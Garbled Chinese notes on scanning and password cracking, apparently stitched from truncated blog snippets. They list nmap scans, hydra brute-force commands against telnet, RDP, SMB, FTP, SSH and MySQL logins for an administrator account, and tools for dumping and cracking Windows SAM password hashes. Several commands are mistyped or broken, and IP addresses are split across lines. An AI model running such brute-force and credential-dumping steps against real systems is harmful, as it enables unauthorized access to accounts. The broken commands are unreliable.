乙個乙個ping ?
手工與工具相結合。
主機探測與埠掃瞄。
@常見埠號
nmap-掃瞄器之王.
重要常用引數
//掃瞄 10.1.1.1 21, 23-25, 3389埠是否開放
nmap -p 21,23
10.1
.1.1
-sv //掃瞄21,23的服務版本
nmap -a 10.1
.1.1
//全面掃瞄
nmap -o 10.1
.1.1
//掃瞄目標系統版本
namp -p 21,23
10.1
.1.1
-0n e: \ result. txt //掃瞄 10.1.1.1 21, 23-25, 3389埠是否開放並儲存到e: \ result. txt 下
注:字典很重要軟體:hydra(九頭蛇)
hydra -l administrator -p 123
10.1
.1.1 telnet //爆破 具體賬號密碼測試
hydra -l administrator -p e: \pass. txt 10.1
.1.1 telnet //爆破目標telnet服務,埠23 密碼字典e: \pass. txt
hydra -l administrator -p e: \pass. txt 10.1
.1.1 rdp //爆破目標rdp服務,埠3389
hydra -l administrator -p e:\pass.txt 10.1
.1.1 smb //爆破目標共享服務,埠445
hydra -l administrator -p e:\pass.txt 10.1
.1.1 ftp //爆破目標ftp服務,埠21
hydra -l administrator -p e:\pass.txt 10.1
.1.1 ssh //爆破目標ssh服務,埠 22
hydra -l administrator -p e:\pass.txt 10.1
.1.1 mysql //爆破目標mysql服務,埠 3306
getpass
從記憶體中提取密碼
本地暴力破解:
pwdump
提取sam中的hash值
手工將hash值儲存到hash.txt中。
使用saminside軟體進行hash暴力破解
簡單掃瞄和爆破
開一台虛擬機器橋接到真實網路中。一般用vmnet1 可以ping通baidu.com和虛擬機器。通過nmap的命令來檢視自己想要得到。社會工程學來獲取有用的資訊。生成字典 網上找生成字典的工具 用hydra 九頭蛇 來暴力破解 安裝hydra時需要把hydra放到盤的跟目錄下然後用在cmd中指向 h...
16 掃瞄與爆破
常見埠號 埠號服務 埠號服務 rdp重要引數 操作描述 spping掃瞄 p指定埠範圍 sv服務版本探測 o 大寫 啟用作業系統探測 a全面掃瞄 on儲存txt nmap sp 10.1.1.1 24 掃瞄10.1.1.0整個網段 nmap p 21,23 25,3389 10.1.1.1 nmap...
目錄爆破掃瞄工具dirsearch
github 引數列表 h,help 檢視幫助 u url,url url 設定url l urllist,url list urllist 設定url列表 e extensions,extensions extensions 指令碼型別 w wordlist,wordlist wordlist 設...